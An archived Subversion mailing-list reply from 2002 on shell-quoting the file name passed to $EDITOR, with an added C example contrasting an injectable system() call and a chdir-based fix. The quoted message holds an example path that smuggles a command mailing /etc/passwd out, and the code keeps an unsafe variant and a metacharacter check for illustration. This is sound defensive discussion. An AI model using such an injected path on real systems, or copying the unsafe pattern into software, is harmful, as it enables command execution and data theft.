
Re: [PATCH] Quote filename passed to $EDITOR

From: Marcus Comstedt <marcus_at_mc.pp.se>
Date: 2002-07-23 22:17:05 CEST

Ulrich Drepper <drepper@redhat.com> writes:

> A svn repository can be set up by somebody with foul intentions.
> Somebody else accesses it and the system() call gets executed on the
> paths chosen by whoever created it. Then the patch could be something
> like in this example:
>
> cat /dev/$(mail to-me@test.com < /etc/passwd; echo null)
>
> If the appropriate path component is never really shown anywhere this
> might go completely unnoticed.

Yup. It's correct that names from the repository should not be
inserted without careful quoting. Fortunately, we don't need to
insert names from the repository at all here, since the filename can
be made relative to the cwd by doing a strategic cd.

(As a side note, such a path would be shown when you check out the
 repository, although you may not notice it among all the other
 pathnames.)

  // Marcus
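The approach Marcus describes, as an added example written for this archive page rather than code from the thread or from Subversion itself: a repository-supplied directory must never be spliced into the string handed to system(), so the client changes into that directory and invokes $EDITOR on a fixed, client-chosen file name instead. The function names (has_shell_meta, split_dir_base, editor_cmdline, unsafe_editor_cmdline, run_editor_in_dir), the constant COMMIT_TMP_NAME and the sample path are all constructed for this example; the unsafe variant is kept only to show the shape of the bug and is never executed.

```c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Constructed for this example: the fixed name of the commit-message
   temp file, chosen by the client and never by the repository. */
#define COMMIT_TMP_NAME "svn-commit.tmp"

/* Detection helper: nonzero if s contains bytes the shell would interpret.
   Illustrates why a repository path must never be spliced into a shell
   command; the safe path below avoids splicing it at all. */
int has_shell_meta(const char *s)
{
    return strpbrk(s, "$`\"'\\;&|<>()*?[]{}~ \t\n") != NULL;
}

/* Split a repository-relative path into directory and base name.
   "main.c" -> ".", "main.c";  "/x" -> "/", "x".  Returns 0 on success. */
int split_dir_base(const char *path, char *dir, size_t dlen,
                   char *base, size_t blen)
{
    const char *slash = strrchr(path, '/');
    size_t dn;

    if (slash == NULL) {
        if (dlen < 2 || strlen(path) + 1 > blen)
            return -1;
        strcpy(dir, ".");
        strcpy(base, path);
        return 0;
    }
    dn = (size_t)(slash - path);
    if (dn == 0)
        dn = 1;                      /* keep the leading "/" */
    if (dn + 1 > dlen || strlen(slash + 1) + 1 > blen)
        return -1;
    memcpy(dir, path, dn);
    dir[dn] = '\0';
    strcpy(base, slash + 1);
    return 0;
}

/* Vulnerable shape (the 'before'): the target directory, which came from
   the repository, is interpolated into the string handed to system(). */
int unsafe_editor_cmdline(const char *editor, const char *target_dir,
                          char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "%s %s/%s", editor, target_dir, COMMIT_TMP_NAME);
    return (n >= 0 && (size_t)n < outlen) ? 0 : -1;
}

/* Safe shape: only the user's own $EDITOR string and the constant temp
   name reach the shell; the repository path is not in the string. */
int editor_cmdline(const char *editor, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "%s %s", editor, COMMIT_TMP_NAME);
    return (n >= 0 && (size_t)n < outlen) ? 0 : -1;
}

/* The "strategic cd": enter target_dir, run the editor on the constant
   relative name, and return to the original directory afterwards.
   Returns the system() status, or -1 on a setup failure. */
int run_editor_in_dir(const char *editor, const char *target_dir)
{
    char cmd[1024];
    int status;
    int saved = open(".", O_RDONLY);  /* remember the cwd via a descriptor */

    if (saved < 0)
        return -1;
    if (editor_cmdline(editor, cmd, sizeof cmd) != 0 || chdir(target_dir) != 0) {
        close(saved);
        return -1;
    }
    status = system(cmd);             /* the shell never sees target_dir */
    if (fchdir(saved) != 0)
        status = -1;
    close(saved);
    return status;
}

int main(void)
{
    /* Constructed repository path with a shell metacharacter in a directory name. */
    const char *path = "trunk/$(weird)dir/main.c";
    char dir[256], base[256], cmd[1024];

    split_dir_base(path, dir, sizeof dir, base, sizeof base);
    printf("directory from repository: %s (shell metachars: %s)\n",
           dir, has_shell_meta(dir) ? "yes" : "no");
    unsafe_editor_cmdline("vi", dir, cmd, sizeof cmd);
    printf("unsafe command line: %s\n", cmd);
    editor_cmdline("vi", cmd, sizeof cmd);
    printf("safe command line:   %s\n", cmd);
    return 0;
}
```

The key property is visible in the two command lines the program prints: the unsafe one carries the repository-controlled directory into the shell, while the safe one contains only $EDITOR and a constant, and the directory is reached through chdir(), which interprets nothing.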

Received on Tue Jul 23 22:23:53 2002

This is an archived mail posted to the Subversion Dev mailing list.
